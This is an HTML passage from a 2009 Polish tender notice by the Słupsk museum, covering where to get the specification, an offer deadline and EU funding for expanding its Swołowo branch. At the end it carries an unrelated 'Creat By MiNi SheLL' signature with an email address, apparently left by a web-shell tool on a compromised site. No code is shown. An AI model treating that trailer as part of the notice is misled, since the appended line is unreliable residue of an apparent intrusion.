<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.slupsk.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikacje istotnych warunków zamówienia można uzyskać odpłatnie za cenę 50 zł w sekretariacie  Muzeum Pomorza Środkowego w Słupsku ul. Dominikańska 5-9,  76-200 Słupsk ..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 10:00, miejsce: Muzeum Pomorza Środkowego w Słupsku
ul. Dominikańska 5-9
76-200 Słupsk
Pokój nr 7(sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nr WND-RPPM.06.03.00-00-019/08 /Wzmocnienie potencjału Pomorskiej Krainy w Kratę - etap II - rozbudowa filii MPŚ w Swołowie/ objęty wsparciem w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007 - 2013 - Oś Priorytetowa 6, działanie 6.3.

Creat By MiNi SheLL
Email: jattceo@gmail.com